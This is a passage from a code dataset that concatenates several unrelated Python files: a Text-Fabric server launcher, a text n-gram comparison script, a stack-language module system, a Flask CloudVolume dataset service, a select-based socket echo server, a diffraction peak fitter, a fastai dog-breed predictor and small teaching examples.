def not_on_pause(self):\n if self.last_command == 'p':\n self.exit('Looks like you forgot to unpause?')\n\n return True\n\n def get_date(self, delta=None, as_string=True):\n date = datetime.now()\n\n if delta is not None:\n date += timedelta(days=delta)\n\n return date.strftime(config.DATE_FORMAT) if as_string else date\n\n def get_current_time(self):\n \"\"\"Get current time in HH:MM format.\"\"\"\n return datetime.now().strftime(config.TIME_FORMAT)\n\n def get_duration(self, start, end, as_string=True):\n start_str = self.file[start][2:7]\n stop_str = self.file[end][2:7]\n\n start_time = datetime.strptime(start_str, config.TIME_FORMAT)\n stop_time = datetime.strptime(stop_str, config.TIME_FORMAT)\n\n duration = (stop_time - start_time).seconds\n duration_str = str(timedelta(seconds=duration))[:-3]\n\n return f'{duration_str} ({start_str} - {stop_str})' \\\n if as_string else duration\n\n def write(self, code, msg, new_file=False, change_time=False):\n \"\"\"Write line with time and message to file.\"\"\"\n if change_time:\n last_time_str = self.file[-1][2:7]\n last_time = datetime.strptime(last_time_str, config.TIME_FORMAT)\n last_time += timedelta(minutes=change_time)\n task_time = last_time.strftime(config.TIME_FORMAT)\n self.print(\n f'Modified time +{change_time} minutes: {task_time}',\n color=colored.yellow, pre='\\n'\n )\n else:\n task_time = self.get_current_time()\n line = '{} {} {}\\n'.format(code, task_time, msg)\n write_mode = 'w' if new_file else 'a'\n try:\n with open(self.file_path, write_mode) as f:\n f.writelines(line)\n except IOError:\n self.exit('Can not write the file: ' + self.file_path)\n\n return line[2:]\n\n def read_file(self):\n res = None\n try:\n with open(self.file_path, 'r') as f:\n res = f.readlines()\n except IOError:\n self.exit('Can not read file: ' + self.file_path)\n\n return res\n\n\nif __name__ == '__main__':\n WWorkApp().run()\n","sub_path":"wwork.py","file_name":"wwork.py","file_ext":"py","file_size_in_byte":10011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"72364344","text":"\"\"\"\n.. include:: ../../docs/server/start.md\n\"\"\"\n\nimport sys\nimport os\nfrom platform import system\n\nimport psutil\nimport webbrowser\nfrom time import sleep\nfrom subprocess import PIPE, Popen\n\nfrom ..core.helpers import console\nfrom ..parameters import NAME, VERSION, PROTOCOL, HOST\n\nfrom .command import (\n argKill,\n argShow,\n argNoweb,\n argApp,\n getPort,\n repSlug,\n)\nfrom .kernel import TF_DONE, TF_ERROR\n\nHELP = \"\"\"\nUSAGE\n\ntext-fabric --help\ntext-fabric --version\ntext-fabric -k [app]\ntext-fabric -p [app]\n\ntext-fabric ./path/to/app --locations=locations-string [--modules=modules-string] args\ntext-fabric app[:specifier] args\n\nwhere all args are optional and args have one of these forms:\n\n -noweb\n --checkout=specifier\n --mod=modules\n --set=file\n --modules=modules-string\n --locations=locations-string\n\nEFFECT\n\nIf an app is given and the -k and -p flags are not passed,\na TF kernel for that app is started.\nWhen the TF kernel is ready, a web server is started\nserving a website that exposes the data through\na query interface.\n\nThe default browser will be opened, except when -noweb is passed.\n\nInstead of a standard app that is available on https://github.com/annotation\nyou can also specify an app you have locally, or no app at all.\n\n\n\"\" (empty string): no app\npath-to-directory: the directory in which your app resides. This argument\nmust have a / inside (e.g. ./myapp).\nThe directory may contain zero or more of these app.py, config.yaml, static/display.css\nIf they are found, they will be used.\n\nIf no app is specified, TF features will be loaded according to the\n--locations and --modules args.\n\nFor standard apps, the following holds:\n\n:specifier (after the app)\n--checkout=specifier\n\nThe TF app itself can be downloaded on the fly from GitHub.\nThe main data can be downloaded on the fly from GitHub.\nThe specifier indicates a point in the history from where the app should be retrieved.\n :specifier is used for the TF app code.\n --checkout=specifier is used for the main data.\n\nSpecifiers may be:\n local - get the data from your local text-fabric-data directory\n clone - get the data from your local github clone\n latest - get the latest release\n hot - get the latest commit\n tag (e.g. v1.3) - get specific release\n hash (e.g. 78a03b...) - get specific commit\n\nNo specifier or the empty string means: latest release if there is one, else latest commit.\n\n--mod=modules\n\nOptionally, you can pass a comma-separated list of modules.\nModules are extra sets of features on top op the chosen data source.\nYou specify a module by giving the github repository where it is created,\nin the form\n\n {org}/{repo}/{path}\n {org}/{repo}/{path}:specifier\n\nwhere\n {org} is the github organization,\n {repo} the name of the repository in that organization\n {path} the path to the data within that repo.\n {specifier} points to a release or commit in the history\n\nIt is assumed that the data is stored in directories under {path},\nwhere the directories are named as the versions that exists in the main data source.\n\n--set=file\n\nOptionally, you can pass a file name with the definition of custom sets in it.\nThis must be a dictionary were the keys are names of sets, and the values\nare node sets.\nThis dictionary will be passed to the TF kernel, which will use it when it runs\nqueries.\n\nDATA LOADING\n\nText-Fabric looks for data in ~/text-fabric-data.\nIf data is not found there, it first downloads the relevant data from\ngithub.\n\nMISCELLANEOUS\n\n-noweb Do not start the default browser\n\n\nCLEAN UP\n\nIf you press Ctrl-C the web server is stopped, and after that the TF kernel\nas well.\nNormally, you do not have to do any clean up.\nBut if the termination is done in an irregular way, you may end up with\nstray processes.\n\n-p Show mode. If a data source is given, the TF kernel and web server for that\n data source are shown.\n Without a data source, all local webinterface related processes are shown.\n-k Kill mode. If a data source is given, the TF kernel and web server for that\n data source are killed.\n Without a data source, all local webinterface related processes are killed.\n\"\"\"\n\nFLAGS = set(\n \"\"\"\n -noweb\n\"\"\".strip().split()\n)\n\nBANNER = f\"This is {NAME} {VERSION}\"\n\n\ndef filterProcess(proc):\n procName = proc.info[\"name\"]\n commandName = \"\" if procName is None else procName.lower()\n\n kind = None\n slug = None\n\n trigger = \"python\"\n if commandName.endswith(trigger) or commandName.endswith(f\"{trigger}.exe\"):\n parts = [p for p in proc.cmdline() if p not in FLAGS]\n if parts:\n parts = parts[1:]\n if parts and parts[0] == \"-m\":\n parts = parts[1:]\n if not parts:\n return False\n (call, *args) = parts\n\n trigger = \"text-fabric\"\n if call.endswith(trigger) or call.endswith(f\"{trigger}.exe\"):\n if any(arg in {\"-k\", \"-p\"} for arg in args):\n return False\n slug = argApp(parts)[1]\n ports = ()\n kind = \"text-fabric\"\n else:\n if call == \"tf.server.kernel\":\n kind = \"kernel\"\n elif call == \"tf.server.web\":\n kind = \"web\"\n elif call.endswith(\"web.py\"):\n kind = \"web\"\n else:\n return False\n (slug, *ports) = args\n\n return (kind, slug, *ports)\n return False\n\n\ndef indexProcesses():\n tfProcesses = {}\n for proc in psutil.process_iter(attrs=[\"pid\", \"name\"]):\n test = filterProcess(proc)\n if test:\n (kind, pSlug, *ports) = test\n tfProcesses.setdefault(pSlug, {}).setdefault(kind, []).append(\n (proc.info[\"pid\"], *ports)\n )\n return tfProcesses\n\n\ndef showProcesses(tfProcesses, slug, term=False, kill=False):\n item = (\"killed\" if kill else \"terminated\") if term else \"\"\n if item:\n item = f\": {item}\"\n myself = os.getpid()\n for (pSlug, kinds) in tfProcesses.items():\n if slug is None or (slug == pSlug):\n checkKinds = (\"kernel\", \"web\", \"text-fabric\")\n rSlug = repSlug(pSlug)\n for kind in checkKinds:\n pidPorts = kinds.get(kind, [])\n for pidPort in pidPorts:\n pid = pidPort[0]\n port = pidPort[-1] if len(pidPort) > 1 else None\n portRep = \"\" if port is None else f\": {port:>5}\"\n if pid == myself:\n continue\n processRep = f\"{kind:<12} % {pid:>5}{portRep:>7}\"\n try:\n proc = psutil.Process(pid=pid)\n if term:\n if kill:\n proc.kill()\n else:\n proc.terminate()\n console(f\"{processRep} {rSlug}{item}\")\n except psutil.NoSuchProcess:\n if term:\n console(\n f\"{processRep} {rSlug}: already {item}\", error=True,\n )\n\n\ndef connectPort(tfProcesses, kind, pos, slug):\n pInfo = tfProcesses.get(slug, {}).get(kind, None)\n return pInfo[0][pos] if pInfo else None\n\n\ndef main(cargs=sys.argv):\n console(BANNER)\n if len(cargs) >= 2 and any(\n arg in {\"--help\", \"-help\", \"-h\", \"?\", \"-?\"} for arg in cargs[1:]\n ):\n console(HELP)\n return\n if len(cargs) >= 2 and any(\n arg in {\"--version\", \"-version\", \"-v\"} for arg in cargs[1:]\n ):\n return\n\n isWin = system().lower().startswith(\"win\")\n pythonExe = \"python\" if isWin else \"python3\"\n\n kill = argKill(cargs)\n show = argShow(cargs)\n\n (appName, slug, newPortKernel, newPortWeb) = argApp(cargs)\n\n if appName is None and not kill and not show:\n return\n\n noweb = argNoweb(cargs)\n\n tfProcesses = indexProcesses()\n\n if kill or show:\n if appName is False:\n return\n showProcesses(tfProcesses, None if appName is None else slug, term=kill)\n return\n\n stopped = False\n portKernel = connectPort(tfProcesses, \"kernel\", 1, slug)\n portWeb = None\n\n processKernel = None\n processWeb = None\n\n if portKernel:\n console(f\"Connecting to running kernel via {portKernel}\")\n else:\n portKernel = getPort(portBase=newPortKernel)\n console(f\"Starting new kernel listening on {portKernel}\")\n if portKernel != newPortKernel:\n console(f\"\\twhich is the first free port after {newPortKernel}\")\n processKernel = Popen(\n [pythonExe, \"-m\", \"tf.server.kernel\", slug, str(portKernel)],\n stdout=PIPE,\n bufsize=1,\n encoding=\"utf-8\",\n )\n console(f\"Loading data for {appName}. Please wait ...\")\n for line in processKernel.stdout:\n sys.stdout.write(line)\n if line.rstrip() == TF_ERROR:\n return\n if line.rstrip() == TF_DONE:\n break\n sleep(1)\n stopped = processKernel.poll()\n\n if not stopped:\n portWeb = connectPort(tfProcesses, \"web\", 2, slug)\n if portWeb:\n console(f\"Connecting to running webserver via {portWeb}\")\n else:\n portWeb = getPort(portBase=newPortWeb)\n console(f\"Starting new webserver listening on {portWeb}\")\n if portWeb != newPortWeb:\n console(f\"\\twhich is the first free port after {newPortWeb}\")\n processWeb = Popen(\n [\n pythonExe,\n \"-m\",\n \"tf.server.web\",\n slug,\n str(portKernel),\n str(portWeb),\n ],\n bufsize=0,\n encoding=\"utf8\",\n )\n\n if not noweb:\n sleep(2)\n stopped = (not portWeb or (processWeb and processWeb.poll())) or (\n not portKernel or (processKernel and processKernel.poll())\n )\n if not stopped:\n console(f\"Opening {appName} in browser\")\n webbrowser.open(\n f\"{PROTOCOL}{HOST}:{portWeb}\", new=2, autoraise=True,\n )\n\n stopped = (not portWeb or (processWeb and processWeb.poll())) or (\n not portKernel or (processKernel and processKernel.poll())\n )\n if not stopped:\n try:\n console(\"Press to stop the TF browser\")\n if processKernel:\n for line in processKernel.stdout:\n sys.stdout.write(line)\n except KeyboardInterrupt:\n console(\"\")\n if processWeb:\n processWeb.terminate()\n console(\"TF web server has stopped\")\n if processKernel:\n processKernel.terminate()\n console(\"TF kernel has stopped\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"tf/server/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":11006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"170065007","text":"import sys\nimport pythone_functions2 as pf\nimport docx2txt\ntext_from_google = str(sys.argv[-1])\n\n\nwords_in_text_from_google = len(list(text_from_google.split()))\nnames_and_paths = dict() # имя файла: путь до файла\nfilenames_and_texts = dict() # имя файла: текст файла\nfilenames_and_indents = dict()\n\nfor i in range(1, len(sys.argv) - 1, 2):\n names_and_paths[sys.argv[i]] = sys.argv[i + 1]\n\nfor name, path in names_and_paths.items():\n filenames_and_texts[name] = docx2txt.process(path)\n\nfor name, text in filenames_and_texts.items():\n filenames_and_indents[name] = pf.marking_indentations(filenames_and_texts[name])\n\nfilenames_and_commongrams = dict() # имя файла: общие 4-граммы с text_from_google\nfor filename, text in filenames_and_texts.items():\n filenames_and_commongrams[filename] = pf.making_set_of_common_grams(text_from_google, text)\n\nwith open('tempFiles\\\\newfile.txt', 'w', encoding='utf-8') as made_file:\n made_file.write(' '\n ' Results '\n ''\n \n ' '\n ''\n ''\n ''\n ''\n '')\nfor filename in filenames_and_texts:\n\n set_to_exclude = pf.making_list_of_reapeated_gramms(text_from_google, filenames_and_texts[filename],\n filenames_and_commongrams[filename])[2]\n\n tagged_list_google = pf.adding_tags(text_from_google, filenames_and_commongrams[filename], set_to_exclude)\n tagged_list_trans = pf.adding_tags(filenames_and_texts[filename], filenames_and_commongrams[filename],\n set_to_exclude)\n list_with_tags_and_indents_google = pf.making_paragraphs(pf.marking_indentations(text_from_google),\n tagged_list_google)\n list_with_tags_and_indents_trans = pf.making_paragraphs(filenames_and_indents[filename], tagged_list_trans)\n\n pf.creating_html(list_with_tags_and_indents_google, list_with_tags_and_indents_trans, filename)\n identical_to_write = str(pf.percentage(tagged_list_google, tagged_list_trans))\n with open('tempFiles\\\\newfile.txt', 'a', encoding='utf-8') as made_file:\n made_file.write('\n \n \n\n\"\"\")\n\nwith open('tempFiles\\\\newfile.txt', 'a', encoding='utf-8') as made_file:\n made_file.write('
Name of a fileResult
' + filename + ' ' + str(identical_to_write) +\n \"\"\"% identical
')\n# results:\nprint('len and type sys.argv ', len(sys.argv), type(sys.argv))\nprint('len names_and_paths ', len(names_and_paths))\nprint('len filenames_and_texts ', len(filenames_and_texts))\n","sub_path":"project1_js/get_the_job_done2.py","file_name":"get_the_job_done2.py","file_ext":"py","file_size_in_byte":3254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"360034918","text":"import abc\nfrom collections import defaultdict\nfrom functions import RGFunction\nfrom routines import Routine\nclass RGModuleBase(abc.ABC):\n\t@abc.abstractmethod\n\tdef __init__(self):\n\t\tpass\n\t@abc.abstractmethod\n\tdef __call__(self, func):\n\t\treturn func\n\tdef fullname(self):\n\t\tif self.module is None:\n\t\t\treturn self.name\n\t\telse:\n\t\t\treturn self.module.fullname() + self.name\nclass RGBase(RGModuleBase): # Maybe make this a singleton?\n\tdef __init__(self):\n\t\tself.name = ''\n\t\tself.identifiers = {}\n\t\tself.module = None\n\tdef __call__(self, func):\n\t\tif isinstance(func, (RGFunction, RGSubModuleBase)):\n\t\t\t#if func.name in 'abcdefghijklmnopqrstuvwxyz' and len(func.name) == 1:\n\t\t\tif len(func.name) == 1:\n\t\t\t\tif func.name not in self.identifiers:\n\t\t\t\t\tself.identifiers[func.name] = func\n\t\t\t\t\tself.identifiers[func.name].module = self\n\t\t\t\telse:\n\t\t\t\t\tprint(self.identifiers[func.name], func.name)\n\t\t\t\t\traise ValueError(\"Name already used: %s\" % func.name)\n\t\t\telse:\n\t\t\t\traise ValueError(\"Invalid Name\")\n\t\telse:\n\t\t\traise TypeError\n\t\treturn func\n\tdef __getitem__(self, item):\n\t\tif not isinstance(item, str):\n\t\t\traise TypeError\n\t\tif len(item) < 1:\n\t\t\traise TypeError\n\t\telif len(item) == 1:\n\t\t\tret = self.identifiers[item]\n\t\t\treturn ret\n\t\telif len(item) > 1:\n\t\t\tret = self.identifiers[item[0]]\n\t\t\treturn ret[item[1:]]\nclass RGSubModuleBase(RGModuleBase):\n\tpass\n\nclass RGSubModule(RGSubModuleBase):\n\tdef __init__(self, name):\n\t\tself.name = name\n\t\tself.identifiers = {}\n\t\tself.module = None\n\tdef __call__(self, func):\n\t\tif isinstance(func, (RGFunction, RGSubModuleBase)):\n\t\t\tif len(func.name) == 1:\n\t\t\t\tif func.name not in self.identifiers:\n\t\t\t\t\tself.identifiers[func.name] = func\n\t\t\t\t\tself.identifiers[func.name].module = self\n\t\t\t\telse:\n\t\t\t\t\tprint(self.identifiers[func.name], func.name)\n\t\t\t\t\traise ValueError(\"Name already used: %s\" % func.name)\n\t\t\t\t\t#self.identifiers['!'] = self.identifiers[func.name]\n\t\t\t\t\t#self.identifiers['!'].module = self\n\t\t\t\t\t#self.identifiers[func.name] = func\n\t\t\t\t\t#self.identifiers[func.name].module = self\n\t\t\telse:\n\t\t\t\traise ValueError(\"Invalid Name\")\n\t\telse:\n\t\t\traise TypeError\n\t\treturn func\n\tdef __getitem__(self, item):\n\t\tif not isinstance(item, str):\n\t\t\traise TypeError\n\t\tif len(item) < 1:\n\t\t\traise TypeError\n\t\telif len(item) == 1:\n\t\t\tret = self.identifiers[item]\n\t\t\treturn ret\n\t\telif len(item) > 1:\n\t\t\tret = self.identifiers[item[0]]\n\t\t\treturn ret[item[1:]]\nclass RGSpecialModuleBase(RGSubModuleBase):\n\tpass\nclass Reader(RGSpecialModuleBase):\n\tdef __init__(self, parent, name):\n\t\tself.parent = parent\n\t\tself.name = name\n\t\tself.module = None\n\tdef __getitem__(self, item):\n\t\treturn Value(self, item)\n\tdef __call__(self, func):\n\t\traise TypeError\nclass Setter(RGSpecialModuleBase):\n\tdef __init__(self, parent, name):\n\t\tself.parent = parent\n\t\tself.name = name\n\t\tself.module = None\n\tdef __getitem__(self, item):\n\t\treturn Value(self, item)\n\tdef __call__(self, func):\n\t\traise TypeError\nclass Caller(RGSpecialModuleBase):\n\tdef __init__(self, parent, name):\n\t\tself.parent = parent\n\t\tself.name = name\n\t\tself.module = None\n\tdef __getitem__(self, item):\n\t\treturn Value(self, item)\n\tdef __call__(self, func):\n\t\traise TypeError\nclass Value(RGFunction):\n\tdef __init__(self, parent, name):\n\t\tself.parent = parent\n\t\tself.module = parent\n\t\tself.name = name\n\tdef __call__(self, stack):\n\t\tif isinstance(self.parent, Reader):\n\t\t\tstack.append(self.parent.parent[self.name])\n\t\telif isinstance(self.parent, Setter):\n\t\t\tself.parent.parent[self.name] = stack.pop()\n\t\telif isinstance(self.parent, Caller):\n\t\t\titem = self.parent.parent[self.name]\n\t\t\titem = Routine(item)\n\t\t\titem(stack)\nclass VarModule:\n\tdef __init__(self):\n\t\tself.vars = {}\n\tdef reader(self, name):\n\t\treturn Reader(self, name)\n\tdef setter(self, name):\n\t\treturn Setter(self, name)\n\tdef caller(self, name):\n\t\treturn Caller(self, name)\n\tdef __getitem__(self, item):\n\t\treturn self.vars[item]\n\tdef __setitem__(self, item, val):\n\t\tself.vars[item] = val\n\tdef __delitem__(self, item):\n\t\tdel self.vars[item]\n\t\t","sub_path":"0.8/modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":3954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"456735561","text":"from flask import Blueprint, jsonify, abort\nfrom annotationengine.errors import DataSetNotFoundException\nfrom flask import current_app, g\nimport cloudvolume\nimport requests\nimport os\nbp = Blueprint(\"dataset\", __name__, url_prefix=\"/dataset\")\n\nds_cache = {}\n\nclass MyCloudVolume(cloudvolume.CloudVolume):\n def lookup_supervoxel(self, x, y, z, scale_factor=(1, 1, 1)):\n voxel = self[int(x*scale_factor[0]),\n int(y*scale_factor[1]),\n int(z*scale_factor[2])]\n return int(voxel[0, 0, 0, 0])\n\n\nclass DataSetStore():\n def __init__(self, infoservice):\n url = os.path.join(infoservice, \"api/datasets\")\n r = requests.get(url)\n print(r.status_code)\n dataset_names = r.json()\n\n self.cvd = {}\n self.scale_factors = {}\n self.datasets = {}\n for dataset in dataset_names:\n url = os.path.join(infoservice, \"api/dataset/{}\".format(dataset))\n r = requests.get(url)\n print(r.status_code)\n d= r.json()\n self.datasets[dataset] = d\n path = d['pychunkgraph_segmentation_source']\n vol_path = d['image_source']\n try:\n img_cv = MyCloudVolume(vol_path, mip=0)\n\n self.cvd[dataset] = MyCloudVolume(path, mip=0,\n fill_missing=True,\n cache=True)\n scale_factor = img_cv.resolution / self.cvd[dataset].resolution\n self.scale_factors[dataset] = scale_factor\n except Exception as e:\n print('dataset {} failed to load because {}'.format(dataset, e))\n self.datasets.pop(dataset)\n\n def get_dataset_names(self):\n return [d for d in self.datasets.keys()]\n\n def get_cloudvolume(self, dataset):\n try:\n return self.cvd[dataset]\n except KeyError:\n msg = 'dataset {} not found'.format(dataset)\n raise DataSetNotFoundException(msg)\n\n def get_scale_factor(self, dataset):\n try:\n return self.scale_factors[dataset]\n except KeyError:\n msg = 'dataset {} not found'.format(dataset)\n raise DataSetNotFoundException(msg)\n\n def get_dataset(self, dataset):\n try:\n return self.datasets[dataset]\n except KeyError:\n msg = 'dataset {} not found'.format(dataset)\n raise DataSetNotFoundException(msg)\n\n def lookup_supervoxel(self, dataset, x, y, z):\n cv = self.get_cloudvolume(dataset)\n sf = self.get_scale_factor(dataset)\n return cv.lookup_supervoxel(x, y, z,sf)\n\n\n@bp.route(\"\")\ndef get_datasets():\n db = get_dataset_db()\n return jsonify(db.get_dataset_names())\n\n\n@bp.route(\"/\")\ndef get_dataset(dataset):\n db = get_dataset_db()\n try:\n return jsonify(db.get_dataset(dataset))\n except DataSetNotFoundException:\n abort(404)\n\n\ndef get_dataset_db():\n if 'dataset_db' not in ds_cache:\n ds_cache['dataset_db'] = DataSetStore(current_app.config['INFOSERVICE_ENDPOINT'])\n return ds_cache['dataset_db']\n","sub_path":"annotationengine/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"358295663","text":"# ----------------------------------------------------------------------------\n# Демонстрация асинхронности на базе передачи управления между функциями. \n# Создаем свой event_loop c помощью модуля select\n# ----------------------------------------------------------------------------\nimport socket\n\n# select - Cистемная фукция мониторинга за изменением состояний фаиловых объектов,\n# в unix фаилами является всё (устройства, системные часы, usb и т.п.),\n# каждый запущенный процесс это тоже фаил, например когда мы вызываем у \n# серверного сокета метод баинд, создаётся фаил системного сокета.\n# Селект работает с фаиловыми объектами у которых есть метод .fileno() - возвращает номер фаила\n# (десткрипотор - номер фаилового объекта) в I/O операциях\nfrom select import select # принимает три списка read, write, error\n\nsocket_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsocket_server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nsocket_server.bind(('localhost', 5000))\nsocket_server.listen()\n\nto_monitor = [] # пустой список для мониторинга, в который мы будет складывать объекты готовые для чтения\n\n\n# Реализация собсственного event_loop - менеджер передачи управления в заисимости от состояния объекта,\n# при помощи модуля select\n\n\ndef accept_connections(socket_server):\n client_socket, addr = socket_server.accept()\n print('Connected by', addr)\n \n # добавляем в список мониторинга client_socket\n to_monitor.append(client_socket)\n\n\ndef send_message(client_socket):\n\n data = client_socket.recv(1024)\n \n if data: \n response = f\"Hello world\\n \".encode()\n client_socket.sendall(response)\n client_socket.sendall(data)\n else:\n print(\"Client socket close\")\n client_socket.close()\n\n\ndef event_loop():\n # функция, для асинхронной передачи управления, между функциями send_message и accept_connections\n # сокетами в зависимости от их состояния: готов для чтения, готов для записи\n\n while True:\n # redy_to_read - список сокетов, два пустых списка в виде буферных переменных\n # отдающих последний элемент\n redy_to_read, _, _ = select(to_monitor, [], []) # read, write, errors\n\n for sock in redy_to_read:\n if sock is socket_server:\n accept_connections(sock)\n else:\n send_message(sock)\n\nif __name__ == \"__main__\":\n # добавляем в список для мониторинга\n to_monitor.append(socket_server)\n \n # запускаем обработчик состояний\n event_loop()\n\n # вызываем accept_connections и передаем ему, ранее созданный socket_server\n # accept_connections(socket_server)","sub_path":"async/2_socket_select.py","file_name":"2_socket_select.py","file_ext":"py","file_size_in_byte":3547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"158759641","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\n\nplt.close('all')\n\n#constants\nh = 4.135667662*10**(-18)\n#keV*s\nc = 299792458\n#m/s\ntheta = 45*np.pi/180\n\ndef gaussFunc(x, a, x0, sigma):\n return a*np.exp(-(x - x0)**2 / (2*sigma**2))\n\ndef linFunc(x, a, b):\n return a*x+b\n \ndef loadData(fileName):\n \n with open(fileName) as text:\n \n counts = []\n lister = text.readlines()\n begin = lister.index('<>\\n')+1\n end = lister.index('<>\\n')-1\n data = lister[begin:end]\n for i in data:\n counts.append(float(i)) \n channels = range(0,len(data))\n channels = np.array(channels)\n counts = np.array(counts)\n \n return channels, counts\n \ndef laueDiffFit(fileName, peak_width, peaks_x):\n \n peak_channels = np.array([])\n channels, counts = loadData(fileName)\n for i in peaks_x:\n par_limits = ([0,i-peak_width,0] ,[1200, i+peak_width , 10])\n peak_interval = [(channels[i]-peak_width),(channels[i]+peak_width)]\n x = channels[peak_interval[0]:peak_interval[1]]\n y = counts[peak_interval[0]:peak_interval[1]]\n popt, pcov = curve_fit(gaussFunc, x, y, bounds = par_limits)\n plt.plot(x, y, 'b.')\n plt.plot(x, gaussFunc(x, *popt))\n peak_channels = np.append(peak_channels,popt[1])\n \n peak_energies = 0.01564856*peak_channels-0.07337194\n lambdas = h*c/peak_energies\n # keV\n n = range(10,10+len(peak_energies))\n d = np.array([])\n \n for i in range(len(n)):\n d = np.append(d,n[i]*lambdas[i]/(2*np.sin(theta)))\n \n return lambdas, d\n\nlambdas, d = laueDiffFit('180410_data/glimmer_1800.mca', 25, [412, 453, 514, 566, 622, 677, 735])\nratio = lambdas[0:6]/lambdas[1:7]\navg_ratio = sum(ratio)/6\nprint(ratio)\nprint(avg_ratio)\nprint(d)\nprint(d[0]-d[len(d)-1])\n \n\n\n\n\n\n\n","sub_path":"laue_diffraction.py","file_name":"laue_diffraction.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"15154916","text":"from fastai.imports import *\nfrom fastai.torch_imports import *\nfrom fastai.transforms import *\nfrom fastai.conv_learner import *\nfrom fastai.model import *\nfrom fastai.dataset import *\nfrom fastai.sgdr import *\nfrom fastai.plots import *\n\ntorch.cuda.set_device(0)\n\nPATH = \"data/dogbreed/\"\nsz = 224\narch = resnext101_64\nbs = 58\nlabel_csv = f'{PATH}labels.csv'\nn = len(list(open(label_csv))) - 1 # header is not counted (-1)\nval_idxs = get_cv_idxs(n) # random 20% data for validation set\nlabel_df = pd.read_csv(label_csv)\n\ndef get_data(sz, bs): # sz: image size, bs: batch size\n tfms = tfms_from_model(arch, sz, aug_tfms=transforms_side_on, max_zoom=1.1)\n data = ImageClassifierData.from_csv(PATH, 'train', f'{PATH}labels.csv', test_name='test',\n val_idxs=val_idxs, suffix='.jpg', tfms=tfms, bs=bs)\n\n return data if sz > 300 else data.resize(340, 'tmp') # Reading the jpgs and resizing is slow for big images, so resizing them all to 340 first saves time\n\ndata = get_data(sz, bs)\n\nlearn = ConvLearner.pretrained(arch, data, precompute=False)\nlearn.load('299_pre')\n\ndef prediction(fn):\n root = 'data/dogbreed/prediction_samples/'\n img = plt.imread(root+fn)\n plt.imshow(img);\n\n trn_tfms, val_tfms = tfms_from_model(arch, sz)\n ds = FilesIndexArrayDataset([fn], np.array([0]), val_tfms,root)\n dl = DataLoader(ds)\n preds = learn.predict_dl(dl)\n prediction = learn.data.classes[np.argmax(preds)]\n likelies = [learn.data.classes[breed] for breed in np.argsort(preds)[0][-5:]][3::-1]\n print('Prediction: {}'.format(prediction.capitalize()))\n print('Other likely breeds: {0}, {1}, {2}, {3}'.format(*likelies))\n\ndef pred_output(fn):\n root = 'data/dogbreed/prediction_samples/'\n trn_tfms, val_tfms = tfms_from_model(arch, sz)\n ds = FilesIndexArrayDataset([fn], np.array([0]), val_tfms,root)\n dl = DataLoader(ds)\n preds = learn.predict_dl(dl)\n prediction = learn.data.classes[np.argmax(preds)]\n return prediction \n \nif __name__ == '__main__':\n prediction('aawl1.jpg')\n","sub_path":"roughs/src/predict_function.py","file_name":"predict_function.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"132355472","text":"###\n# File: enclousing.py\n# Created Date: 2020-10-30\n# Author: anddy.liu\n# Contact: \n# \n# Last Modified: Friday October 30th 2020 3:34:01 pm\n# \n# Copyright (c) 2020 personal\n# <>\n# -----\n# HISTORY:\n# Date \t By\tComments\n# ----------\t---\t----------------------------------------------------------\n###\ndef make(n):\n x = []\n for i in range(n):\n x.append(lambda: print(i))\n return x\n\nif __name__ == \"__main__\":\n a = make(3)\n for i in a:\n i()","sub_path":"Learning_Python/Basic/Chapter14/enclousing.py","file_name":"enclousing.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"43844517","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 4 15:52:28 2019\n\n@author: han\n\"\"\"\n\nimport random\nimport time\n\nclass RemoteControl():\n \n def __init__(self,tv_status = \"Off\", tv_volume = 0, channel_list = [\"NHK\"], channel = \"NHK\"):\n \n \n self.tv_status = tv_status\n \n self.tv_volume = tv_volume\n \n self.channel_list = channel_list\n \n self.channel = channel\n \n \n def turnOn_tv(self):\n \n if(self.tv_status == \"ON\"):\n print(\"TV is already ON!\")\n else:\n print(\"TV is opening..\")\n self.tv_status = \"ON\"\n \n \n def turnOff_tv(self):\n if(self.tv_status == \"OFF\"):\n print(\"TV is already OFF!\")\n else:\n print(\"TV is closing..\")\n self.tv_status = \"OFF\"\n \n \n def adjustVolume(self):\n while True:\n answer = input(\"Decrease volume: '<'\\nIncrease volume: '>'Exit: exit\")\n \n if(answer == '<'):\n if(self.tv_volume != 0):\n \n self.tv_volume -= -1\n print(\"Volume:\",self.tv_volume)\n elif (answer == '>'):\n if(self.tv_volume != 32):\n \n self.tv_volume += 1\n \n print(\"Volume:\", self.tv_volume)\n \n else:\n print(\"Volume updated:\",self.tv_volume)\n break\n \n def addChannel(self,channel_name):\n \n print(\"Channel adding..\")\n time.sleep(1)\n \n self.channel_list.append(channel_name)\n \n print(\"Channel added.\")\n \n \n def randomChannel(self):\n randomGenerate = random.randint(0,len(self.channel_list) -1)\n \n self.channel = self.channel_list[randomGenerate]\n \n print(\"Current channel:\",self.channel)\n \n \n def __len__(self):\n \n return len(self.channel_list)\n \n def __str__(self):\n return \"TV status: {}\\nTv volume: {}\\nChannel List: {}\\nCurrent channel: 